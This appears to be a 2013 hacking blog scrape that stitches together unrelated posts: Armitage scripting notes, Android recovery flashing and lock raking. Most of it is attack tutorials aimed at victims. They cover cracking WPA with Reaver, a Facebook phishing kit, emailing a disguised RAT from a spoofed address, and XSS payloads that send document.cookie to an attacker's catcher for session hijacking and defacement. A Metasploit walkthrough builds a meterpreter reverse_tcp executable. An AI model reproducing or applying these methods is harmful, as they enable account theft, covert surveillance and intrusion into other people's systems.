Some meterpreter commands may have shortened output. Multi-player Armitage takes the initial output from a command and delivers it to the client that sent the command. Additional output is ignored (although the command still executes normally). This limitation primarily affects long running meterpreter scripts.

9. Scripting Armitage

9.1 Cortana

Armitage includes Cortana, a scripting technology developed through DARPA's Cyber Fast Track program. With Cortana, you may write red team bots and extend Armitage with new features. You may also make use of scripts written by others.

Cortana is based on Sleep, an extensible Perl-like language. Cortana scripts have a .cna suffix.

Read the Cortana Tutorial to learn more about how to develop bots and extend Armitage.

9.2 Stand-alone Bots

A stand-alone version of Cortana is distributed with Armitage. You may connect the stand-alone Cortana interpreter to an Armitage team server.

Here's a helloworld.cna Cortana script:

on ready {
 println("Hello World!");
 quit();
}

To run this script, you will need to start Cortana. First, stand-alone Cortana must connect to a team server. The team server is required because Cortana bots are another red team member. If you want to connect multiple users to Metasploit, you have to start a team server.

Next, you will need to create a connect.prop file to tell Cortana how to connect to the team server you started. Here's an example connect.prop file:

host=127.0.0.1
port=55553
user=msf
pass=password
nick=MyBot

Now, to launch your bot:

cd /path/to/metasploit/msf3/data/armitage
java -jar cortana.jar connect.prop helloworld.cna

9.3 Script Management

You don't have to run Cortana bots stand-alone. You may load any bot into Armitage directly. When you load a bot into Armitage, you do not need to start a teamserver. Armitage is able to deconflict its actions from any loaded bots on its own.

You may also use Cortana scripts to extend Armitage and add new features to it. Cortana scripts may define keyboard shortcuts, insert menus into Armitage, and create simple user interfaces.

To load a script into Armitage, go to Armitage -> Scripts. Press Load and choose the script you would like to load. Scripts loaded in this way will be available each time Armitage starts.

Output generated by bots and Cortana commands are available in the Cortana console. Go to View -> Script Console.

9.4 Resources

Cortana is a full featured environment for developing red team bots and extending Armitage. If you'd like to learn more, take a look at the following resources:

credit

Crack wifi WPA

2013-07-29T05:27:00.003-07:00

Crack WPA

Your Wi-Fi network is your conveniently wireless gateway to the internet, and since you're not keen on sharing your connection with any old hooligan who happens to be walking past your home, you secure your network with a password, right? Knowing, as you might, how easy it is to crack a WEP password, you probably secure your network using the more bulletproof WPA security protocol.

Here's the bad news: A new, free, open-source tool called Reaver exploits a security hole in wireless routers and can crack most routers' current passwords with relative ease. Here's how to crack a WPA or WPA2 password, step by step, with Reaver—and how to protect your network against Reaver attacks.

In the first section of this post, I'll walk through the steps required to crack a WPA password using Reaver. You can follow along with either the video or the text below. After that, I'll explain how Reaver works, and what you can do to protect your network against Reaver attacks.

First, a quick note: As we remind often remind readers when we discuss topics that appear potentially malicious: Knowledge is power, but power doesn't mean you should be a jerk, or do anything illegal. Knowing how to pick a lock doesn't make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise. The more you know, the better you can protect yourself.

What You'll Need

You don't have to be a networking wizard to use Reaver, the command-line tool that does the heavy lifting, and if you've got a blank DVD, a computer with compatible Wi-Fi, and a few hours on your hands, you've got basically all you'll need. There are a number of ways you could set up Reaver, but here are the specific requirements for this guide:

The BackTrack 5 Live DVD. BackTrack is a bootable Linux distribution that's filled to the brim with network testing tools, and while it's not strictly required to use Reaver, it's the easiest approach for most users. Download the Live DVD from BackTrack's download page and burn it to a DVD. You can alternately download a virtual machine image if you're using VMware, but if you don't know what VMware is, just stick with the Live DVD. As of this writing, that means you should select BackTrack 5 R1 from the Release drop-down, select Gnome, 32- or 64-bit depending on your CPU (if you don't know which you have, 32 is a safe bet), ISO for image, and then download the ISO.
A computer with Wi-Fi and a DVD drive. BackTrack will work with the wireless card on most laptops, so chances are your laptop will work fine. However, BackTrack doesn't have a full compatibility list, so no guarantees. You'll also need a DVD drive, since that's how you'll boot into BackTrack. I used a six-year-old MacBook Pro.
A nearby WPA-secured Wi-Fi network. Technically, it will need to be a network using WPA security with the WPS feature enabled. I'll explain in more detail in the "How Reaver Works" section how WPS creates the security hole that makes WPA cracking possible.
A little patience. This is a 4-step process, and while it's not terribly difficult to crack a WPA password with Reaver, it's a brute-force attack, which means your computer will be testing a number of different combinations of cracks on your router before it finds the right one. When I tested it, Reaver took roughly 2.5 hours to successfully crack my password. The Reaver home page suggests it can take anywhere from 4-10 hours. Your mileage may vary.

Let's Get Crackin'

At this point you should have BackTrack burned to a DVD, and you should have your laptop handy.

Step 1: Boot into BackTrack

To boot into BackTrack, just put the DVD in your drive and boot your machine from the disc. (Google around if you don't know anything about live CDs/DVDs and need help with this part.) During the boot process, BackTrack will prompt you to to choose the boot mode. Select "BackTrack Text - Default Boot Text Mode" and press Enter.

Eventually BackTrack will boot to a command line prompt. When you've reached the prompt, typestartxand press Enter. BackTrack will boot into its graphical interface.

Step 2: Install Reaver

Reaver has been added to the bleeding edge version of BackTrack, but it's not yet incorporated with the live DVD, so as of this writing, you need to install Reaver before proceeding. (Eventually, Reaver will simply be incorporated with BackTrack by default.) To install Reaver, you'll first need to connect to a Wi-Fi network that you have the password to.

Click Applications > Internet > Wicd Network Manager
Select your network and click Connect, enter your password if necessary, click OK, and then click Connect a second time.

Now that you're online, let's install Reaver. Click the Terminal button in the menu bar (or click Applications > Accessories > Terminal). At the prompt, type:

apt-get update

And then, after the update completes:

apt-get install reaver

If all went well, Reaver should now be installed. It may seem a little lame that you need to connect to a network to do this, but it will remain installed until you reboot your computer. At this point, go ahead and disconnect from the network by opening Wicd Network Manager again and clicking Disconnect. (You may not strictly need to do this. I did just because it felt like I was somehow cheating if I were already connected to a network.)

Step 3: Gather Your Device Information, Prep Your Crackin'

In order to use Reaver, you need to get your wireless card's interface name, the BSSID of the router you're attempting to crack (the BSSID is a unique series of letters and numbers that identifies a router), and you need to make sure your wireless card is in monitor mode. So let's do all that.

Find your wireless card: Inside Terminal, type:

iwconfig

Press Enter. You should see a wireless device in the subsequent list. Most likely, it'll be namedwlan0, but if you have more than one wireless card, or a more unusual networking setup, it may be named something different.

Put your wireless card into monitor mode: Assuming your wireless card's interface nameiswlan0, execute the following command to put your wireless card into monitor mode:

airmon-ng start wlan0

This command will output the name of monitor mode interface, which you'll also want to make note of. Most likely, it'll bemon0, like in the screenshot below. Make note of that.

Find the BSSID of the router you want to crack: Lastly, you need to get the unique identifier of the router you're attempting to crack so that you can point Reaver in the right direction. To do this, execute the following command:

airodump-ng wlan0

(Note: Ifairodump-ng wlan0doesn't work for you, you may want to try the monitor interface instead—e.g.,airodump-ng mon0.)

You'll see a list of the wireless networks in range—it'll look something like the screenshot below:

When you see the network you want, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (it's the series of letters, numbers, and colons on the far left). The network should have WPA or WPA2 listed under the ENC column. (If it's WEP, use our previous guide to cracking WEP passwords.)

Now, with the BSSID and monitor interface name in hand, you've got everything you need to start up Reaver.

Step 4: Crack a Network's WPA Password with Reaver

Now execute the following command in the Terminal, replacingbssidandmoninterfacewith the BSSID and monitor interface and you copied down above:

reaver -i moninterface -b bssid -vv

For example, if your monitor interface wasmon0like mine, and your BSSID was8D:AE:9D:65:1F:B2(a BSSID I just made up), your command would look like:

reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv

Press Enter, sit back, and let Reaver work its disturbing magic. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my successful test, Reaver took 2 hours and 30 minutes to crack the network and deliver me with the correct password. As mentioned above, the Reaver documentation says it can take between 4 and 10 hours, so it could take more or less time than I experienced, depending. When Reaver's cracking has completed, it'll look like this:

A few important factors to consider:Reaver worked exactly as advertised in my test, but it won't necessarily work on all routers (see more below). Also, the router you're cracking needs to have a relatively strong signal, so if you're hardly in range of a router, you'll likely experience problems, and Reaver may not work. Throughout the process, Reaver would sometimes experience a timeout, sometimes get locked in a loop trying the same PIN repeatedly, and so on. I just let it keep on running, and kept it close to the router, and eventually it worked its way through.

Also of note, you can also pause your progress at any time by pressing Ctrl+C while Reaver is running. This will quit the process, but Reaver will save any progress so that next time you run the command, you can pick up where you left off-as long as you don't shut down your computer (which, if you're running off a live DVD, will reset everything).

How Reaver Works

Now that you've seen how to use Reaver, let's take a quick overview of how Reaver works. The tool takes advantage of a vulnerability in something called Wi-Fi Protected Setup, or WPS. It's a feature that exists on many routers, intended to provide an easy setup process, and it's tied to a PIN that's hard-coded into the device. Reaver exploits a flaw in these PINs; the result is that, with enough time, it can reveal your WPA or WPA2 password.

Read more details about the vulnerability at Sean Gallagher's excellent post on Ars Technica.

How to Protect Yourself Against Reaver Attacks

Since the vulnerability lies in the implementation of WPS, your network should be safe if you can simply turn off WPS (or, even better, if your router doesn't support it in the first place). Unfortunately, as Gallagher points out as Ars, even with WPS manually turned off through his router's settings, Reaver was still able to crack his password.

In a phone conversation, Craig Heffner said that the inability to shut this vulnerability down is widespread. He and others have found it to occur with every Linksys and Cisco Valet wireless access point they've tested. "On all of the Linksys routers, you cannot manually disable WPS," he said. While the Web interface has a radio button that allegedly turns off WPS configuration, "it's still on and still vulnerable.

So that's kind of a bummer. You may still want to try disabling WPS on your router if you can, and test it against Reaver to see if it helps.

You could also set up MAC address filtering on your router (which only allows specifically whitelisted devices to connect to your network), but a sufficiently savvy hacker could detect the MAC address of a whitelisted device and use MAC address spoofing to imitate that computer.

Double bummer. So what will work?

I have the open-source router firmware DD-WRT installed on my router and I was unable to use Reaver to crack its password. As it turns out, DD-WRT does not support WPS, so there's yet another reason to love the free router-booster. If that's got you interested in DD-WRT, check their supported devices list to see if your router's supported. It's a good security upgrade, and DD-WRT can also do cool things like monitor your internet usage, set up a network hard drive, act as a whole-house ad blocker, boost the range of your Wi-Fi network, and more. It essentially turns your $60 router into a $600 router.

credit

What is a Recovery and How to Flash One.

2013-07-29T05:19:00.000-07:00

What is a recovery?

Well recovery is something on android that basically allows you to flash zips which may contain apps, mods or custom roms. Every phone has a specific recovery for it which means you cant use a recovery that is for Galaxy Note II on Xperia Z.

What does flash mean?

Well flash is basically when you install something using a recovery it is called flash.

Which recovery should I install?

There are a lot of recoveries out there for your phone but for tutorials on this site we are going to be using "ClockWorkMod (CWM)" or "4ext Recovery" (btw i use 4ext). The Famous 3 recoveries are TeamWinRecoveryProject (TWRP), CWM , 4ext Recovery. But not every phone has these three recoveries available for them some have only CWM or TWRP or 4ext but famous phones such as Note II has all of them.

Downloads

You Just Need This Extract it.

How to install a recovery?

Well there are many different ways for installing recoveries on your phone but there are two most common ways

A) By ADB Fastboot:

This Method is only usable after you have found the recovery you want to install. A recovery is an .img file.

1.Download The recovery .img you want to install.

2.Rename it to "recovery.img".

3.Copy "recovery.img" to the folder you extracted earlier
4. Now Press RightClick+Shift and then select Open Command Window Here.
5.Now just type "fastboot flash recovery recovery.img"
6.Done.

B) By Rom Manager For CWM:
This method is only usable if you have root.

1.Go to Googly Play
2.Search "Rom Manager'
3.Install it.
4.Open it and grant it root permissions.
5.Select Flash recovery and then your Device (If it doesn't show your device than your device doesn't have a cwm recovery).
6.Done

C) By Goo Manager TWRP:
This is only usable with root.

1.Go to Googly Play
2.Search "Goo Manager'
3.Install it.
4.Open it and grant it root permissions.
5. Open it and hit menu - Install OpenRecoveryScript.
6.Select a recovery and hit install.
7.Done

D) By 4ext Recovery:
Only usable with root.

1. Go to http://4ext.net and download the free version
or
1.Go to Googly Play
2.Search "4ext Recovery''
3.Install it.
4.Open it and grant it root permissions.
6.Select "Online Upgrade" say yes if anything pops up.
7.It should detect your phone and if it detects wrong phone don't continue.
8.Select Recovery install it.
9.Done

How to pick a lock

2013-07-28T05:08:00.004-07:00

How to pick a lock

Lock picking is considered by some to be the original "hack". Long before computers there were locks and someone who wanted to manipulate them. The common misconception when picking a lock is that the process is difficult when, in actuality, it is quite simple. There are my methods to picking a lock but for this post we are going to go over the most basic method, “raking” or “scrubbing”.

Raking a lock is a simple, yet effective, way of manipulating the pins in a lock to open it without a key and can be achieved by the following steps:

Insert the rake into the lock and make sure you are past the last pin. I like to push all the pins up so I can feel where the rake is placed in the lock. If you do not have a rake, one can be purchased from Bump My Lock
Insert the tension tool into the lock not to obstruct the rake.
Apply sight pressure on the tension tool in the direction you want to open the lock. This is the most difficult step in the process and will take some time to learn the right amount of tension. When teaching I like to use a rubber band on the end of the tension tool and pull just to when the rubber band starts to stretch.
Try not and touch the walls of the key way and pull the rake straight out in one solid fast motion.
If the lock does not open on the first try don't fret, insert the rake again, adjust your tension, and repeat the process.

Even though this is a simple way of picking a lock it will still take a good deal of practice and time to learn the skills and movements involved. One great tool for learning how to pick locks is the Lock Pick School in a Box and our Clear Practice Locks; both can be found here.

Zeus Virus

2013-07-28T05:07:00.000-07:00

Zeus Virus

The 'Zeus Trojan Horse' Virus once again had a come back. According to a resource, it has an ability to drain your Bank accounts easily.

Zeus Virus can propagate through phishing messages that are generated from the account that was already compromised with phishing. That phished account will then start sending messages to your friends containing links to the ads and would ask them to simply check-out the video or product by clicking on such links. This way the virus will go viral.

Readers are requested to stay refrain from clicking such links, because they might end up getting their accounts compromised The virus is very sophisticated, so that it could replace the website of a bank with the mimicked page of its own.

That fake page could then ask for your security information and some other important data that could be easily sold in black market.

According to many sources, perhaps it has been confirmed that those pages are being hosted by Russian Mafia (known as Russian Business Network as well).

About Zeus(Virus)

The virus is well-known for what it use to do. It was detected once back in 2007, and after that detection it started to spread online. The virus is well-designed so that if you would click on it, the possible and important data like Passwords and Bank Accounts can be stolen easily.

Does Facebook Took Action Against It?

Facebook is aware of it, but it is unlikely that Facebook is going to take any action against it.

The founder of advocacy group Fans Against Kounterfeit Enterprise (FAKE) said that he was trying to alert Facebook about this issue to take action against it as soon as possible, but unluckily he was not satisfied well with their response.

Those who are using windows should stay much careful about this issue. It has been said that Windows devices are much infected with this virus. Hence, Mac OS X or Linux are still safe of this virus.

Some countries like USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.

How To Hack Facebook Using Phisher Method

2013-07-21T05:45:00.002-07:00

1. First a fall you need a fake login page for facebook (fake.html),and a Php script to redirect and capture the victims passwords (login.php), You can download both the files from Here

2. To get the password click Here

3. After you download the files, Open login.php,with a note pad and search for the term www.enteryoursite.com and replace it with the site address where you want the victim to be redirected ,finally save it

Note : This a very important step redirect the victim to a proper site other wise the victim will get suspicious .In our case we are making fake face book login page so its better to redirect the victim to www.facebook.com/careers

4. Now create an account at Free web hosting site like 110mb.com , T35.com or ripway.com

5. Now upload both the files (fake.html , login.php ) to your hosting account and send the fake.html(fake facbook login page) link to your victim

Example :-
www.yoursite.110 mb.com/fake.html

6. Now when the victim enters all his credentials, like login name and password in our fake login page and when he clicks login He will be redirected to site which we did in step 3

7. Now to see the victims id ,password, login to your hosting account "110mb.com " where you will see a new file "log.txt" .Open it to see the victims user id and the password

Leave a comment if you don't understand

What is Phishing

2013-07-21T05:14:00.002-07:00

Phishing
Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

List of phishing techniques

Phishing

Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.

Spear phishing

Phishing attempts directed at specific individuals or companies have been termed spearphishing. Attackers may gather personal information about their target to increase their probability of success.

Clone phishing

A type of phishing attack whereby a legitimate, and previously delivered, email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email. The attachment or Link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a resend of the original or an updated version to the original.

This technique could be used to pivot (indirectly) from a previously infected machine and gain a foothold on another machine, by exploiting the social trust associated with the inferred connection due to both parties receiving the original email.

Whaling

Several recent phishing attacks have been directed specifically at senior executives and other high profile targets within businesses, and the term whaling has been coined for these kinds of attacks.[36]

Link manipulation

Most methods of phishing use some form of technical deception designed to make a link in an email appear to belong to some trusted organization or spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL

www.micosoft.com

www.mircosoft.com

www.verify-microsoft.com

instead of www.microsoft.com

Filter evasion

Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails.

For Example:

Website forgery

Once a victim visits the phishing website, the deception is not over. Some phishing scams use JavaScript commands in order to alter the address bar.[44] This is done either by placing a picture of a legitimate URL over the address bar, or by closing the original address bar and opening a new one with the legitimate URL.

An attacker can even use flaws in a trusted website's own scripts against the victim.[46] These types of attacks (known as cross-site scripting) are particularly problematic, because they direct the user to sign in at their bank or service's own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, making it very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.[47]

A Universal Man-in-the-middle (MITM) Phishing Kit, discovered in 2007, provides a simple-to-use interface that allows a phisher to convincingly reproduce websites and capture log-in details entered at the fake site.[48]

To avoid anti-phishing techniques that scan websites for phishing-related text, phishers have begun to use Flash-based websites. These look much like the real website, but hide the text in a multimedia object.[49]

How To Identify A Fraudulent E-mail?

Here are a few phrases to look for if you think an e-mail message is a phishing scam.

“Verify your account.”

Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through e-mail.

“If you don’t respond within 48 hours, your account will be closed.”

These messages convey a sense of urgency so that you’ll respond immediately without thinking.

“Dear Valued Customer.”

Phishing e-mail messages are usually sent out in bulk andoften do not contain your first or last name.

“Click the link below to gain access to your account.”

HTML-formatted messages can contain links or forms that you can fill out just as you’d fill out a form on a Web site. The links that you are urged to click may contain all or part of a real company’s name and are usually “masked,” meaning that the link you see does not take you to that address but somewhere different, usually a scam Web site.

So The Bottom Line To Defend From Phishing Attack Is

1. Never assume that an email is valid based on the sender’s email address.

2. A trusted bank/organization such as paypal will never ask you for your full name and password in a PayPal email.

3. An email from trusted organization will never contain attachments or software.

4. Clicking on a link in an email is the most insecure way to get to your account

Ways to Hack An Email

2013-07-21T04:42:00.001-07:00

I know most of you might be wondering to know how to hack email? You as the reader are most likely reading this because you want to hack into someone’s email account or catch a cheating spouse, girl/boy friend by gaining access to their email accounts. So read on to find out the real and working ways to hack any email and expose the truth behind the lies.

Is it Possible to Hack Email?

Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to hack email, the following are the things you should be aware of.

1. There is no ready made software that can hack emails and get you the password just with a click of a button. So if you come accross any website that claims to sell such softwares, I would advise you not to trust them.

2. Never trust any email hacking service that claims to hack any email for just $100 or $200. Most of them are no more than a scam.

3. With my experience of over 3 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods for hacking email. All the other methods are simply scam or don’t work.

The Following are the only Two working and Foolproof methods to hack any email.

1. Keylogging - Using a Keylogger

2. Phishing

What is a Keylogger

A keylogger is a hardware device or a software program that records the real time activity of a computer user including the keyboard keys they press. Keyloggers are used in mainly used IT organizations to troubleshoot technical problems with computers and business networks. Keyloggers can also be used by a family (or business) to monitor the network usage of people without their direct knowledge. Finally, malicious individuals may use keyloggers on public computers to steal passwords or credit card information.

What is Phishing

Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as username, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal and other online banks are common targets Phishing is typically carried out by email or instant messaging and often directs users to enter details at a website

To Know More Go To:

What is Phishing

How to make a Phisher/Fake page for any Website

How to hack a Facebook account

2013-07-21T03:32:00.001-07:00

TUTORIAL: Hack anyone Facebook,email or PC..
This tutorial is like a spreading tutorial way basically. But more precise and powerful
REQUIREMENTS:-
1) A fully FUD server (SERVER BEING FUD is the most important part of the hack)
2) Patience
That's all...
Now coming to the hack...
there are basically thousands of tutorials in HF about keylogger,RAT,stealer and crypting...
so read one and make your server fully fud...
Now do just as what i say:-
1) go to " http://emailattack.host22.com/emailspoof.php " and leave that tab open
2) now login to your facebook and copy the username of the person(FB username) you want
to hack
like this....
http://imageshack.us/photo/my-images/543/username.png
so basically the name after the http://www.facebook.com/ is the username...
in my example "RANDOM" is the username....
if the link shows url like "https://www.facebook.com/profile.php?id=100003721756694"
then you cannot use this method on them....
3) as you are the friend of the person you must know who he his/her best friend or just
close friend....
so basically get his email id attached to his Facebook like
http://imageshack.us/photo/my-images/152/contactw.png
[this can be hard if you don't have this person as your friend]
anyways you can ask his/her email id if you know him....
4)Now just open that spoofer tab and paste the info as follows:-
in Spoofed Email: the id you stolen from the contact info: ex: something@anymail.com
in Targets Email: username@facebook.com, ex: random@facebook.com
in Reply Email: same as spoofed email
in message title: hi or whatever
in message body : Hi check out my new pics uploaded here: "link of your key-logger,rat or
whatever"
HE/SHE WILL RECEIVE THAT MESSAGE FROM THE SPOOFED PERSON AND AS HE/SHE IS
HER CLOSE FRIEND SHE WILL DEFINITELY DOWNLOAD AND RUN IT
VICTIM WILL TAKE SOME TIME TO READ THE MESSAGE>DOWNLOAD THE FILE>RUN IT.
THAT'S WHY I SAID PATIENCE IS A REQUIREMENT ....
PRO-TIP:
1) If you are using the message from the example then i suggest you to download some of
the spoofed person(victim friend)
pictures and use icon-changer to change your server icon to JPEG icon and put all that pics
and your server to an .rar file and
upload it to the hosting site....
Lol,,,, no one sees the extension if you do this thing..
2) use rat's crew extension spoofer to change the extension to JPEG and change server icon
to JPEG too....
IT TOOK ME 2 HOURS TO WRITE THIS TUTORIAL . PLEASE TAKE 10 SECONDS TO SAY
THANKS.
I DONT KNOW WHO IS UNKNOWN1 BUT I LOVE HIM FOR HIS PHP
FILE....
THAT SITE I GAVE YOU IS MY PERSONAL... DOWNLOAD THAT
PHP AND MAKE YOUR OWN SITE IF IN SOME CASE MY WEBSITE
GETS DELETED.
I MADE THAT WEBSITE BY A TUTORIAL POSTED IN HF... IT IS
DELETED NOW SO I DON'T KNOW WHO WAS THE AUTHOR... BUT
ANYWAYS.. A BIG THANKS TO HIM.

XXS (cross site scripting tut)

2013-07-20T08:29:00.003-07:00

Complete XSS Tutorial

Hello Guys Today i will write a Complete Tutorial on XSS.

First Of All XSS is in 2 Types, Persistent and Non-Persistent type.

For XSS we will use something called a Cookie Catcher.

Question will be that why we would need someones else cookies?

The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking.

First go to a free hosting site like http://www.110mb.com or any other php hosting sites and register there. Then download this cookie catcher and upload it.

Cookie Catcher: http://adf.ly/1I5oz

What does the cookie catcher do?

It grabs the user's:

[*]Cookies

[*]IP

[*]Referral Link. Which Page is attached to that Link

[*]Time And Date

Get Vulnerable sites:

Ok first we need sites that are vulnerable to XSS so it will work on them.

To test it we will need to add a code after the link.

I will use this site that many of you probably saw it before.

http://adf.ly/Tdo3

Now for testing If a site is vulnerable or not you can add these codes:

"><script>alert(document.cookie)</script>

'><script>alert(document.cookie)</script>

"><script>alert("Test")</script>

'><script>alert("Test")</script>

Or a new one which i found out myself in which you can inject HTML:

"><body bgcolor="FF0000"></body>

"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>

Then if we see a java script popup:

Or if you used my testing and you saw the page's background go black or a page of google opens in that site it means its vulnerable to XSS attack.

In the end, if your site is http://www.example.com

The link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>

Persistent XSS:

In this method we will grab the slave's cookies with no suspection and completely stealth.

Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.

Ok now lets go to this site: http://adf.ly/1I6ns

Now test and see if the XSS vulnerable test work on it.

It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type or submit it, add this:

and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???

so they wont suspect you.

Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher.php search for cookies.html which is a new file that show you the cookies. Like if your cookie catcher link would be: http://www.example.com/cookie catcher.php

The container of the cookies would be: http://www.example.com/cookies.html

Now visit cookies.html and you would see the session of that cookie!

Now there is another way for a cookie grabbing drive by, add this code and post it:

Then post it in the forum or the comment box.

Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a

ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.

Non-Persistent XSS:

Ok in this method we will make the slave admin go to our link. First we will pick a XSS vulnerable site. For this method we will need a search.php which that page is vulnerable to XSS and has cookies in that page. In the vulnerable search.php in the textbox for the word to search for type:

script>alert(document.cookie)</script>

And click the search button. If you see a javascript popup means its vulnerable to Non-Persistent XSS attack. Ok now we will do something similar.

I will use this link for this method: http://adf.ly/1I6ns

Now in front of the search.php?search= add this:

"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

Now go to http://www.spam.com and shrink the whole page's link. Try to find a site administrator's E-mail in that vulnerable website and send a Fake Mail from a online fake mailer like this one: GET FREE FAKE MAILER

Now in the body just tell something fake like[/color]: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the spam will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him.

Session Hijacking:

Ok now you have the Admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note open Notepad. The ; separates cookies from each other so first copy the code before the ; .

Now go in that vulnerable website and clear the link. Instead of that link add this:

Javascript:void(document.cookie="")

or for an example:

Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And you are logged in as administrator.

So now go in your Admin Panel and upload your Deface Page.

Good Luck. Now you have Hacked a Website with XSS.

Metasploit

2013-07-20T08:27:00.001-07:00

--- The Metasploit Framework ---

Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.

Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.

Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.

The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).

In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.

Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.

Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.

Payload: Actual code which runs on the compromised system after exploitation

Now, what Metasploit IS?

It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.

METASPLOIT ANTI FORENSICS:

Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.

Metasploit comes in the following versions:

1. CLI (Command Line Interface)

2. Web Interface

3. MSF Console

4. MSFwx

5. MSFAPI

I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.

I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.

For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.

Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.

Let the Hacking Begin :

Open up backtrack. You should have a screen similar to this.

The default login credentials are:

Username: root

Pass: toor

Type in

root@bt:~#/etc/init.d/wicd start

to start the wicd manager

Finally, type "startx" to start the GUI mode:

root@bt:~#startx

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:

root@bt:~#ifconfig

It would be something like 192.168.x.x or 10.x.x.x.

Have a note of it.

Now,

Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now be having a shell something similar to a command prompt in windows.

msf >

Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.

Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe

Your local IP is the one you noted earlier and for port you could select 4444.

(Everything has to be entered without quotes)

You should get something like this:

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

Length: 290

Options: LHOST=192.168.255.130,LPORT=4444

root@bt:/opt/metasploit3/msf3#

Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.

Now open the 1st shell window with msfconsole in it.

msf >

Type the following:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130

LHOST => 192.168.255.130

msf exploit(handler) > set LPORT 4444

LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you.

And now, you have set the meterpreter to listen to you on port 4444.

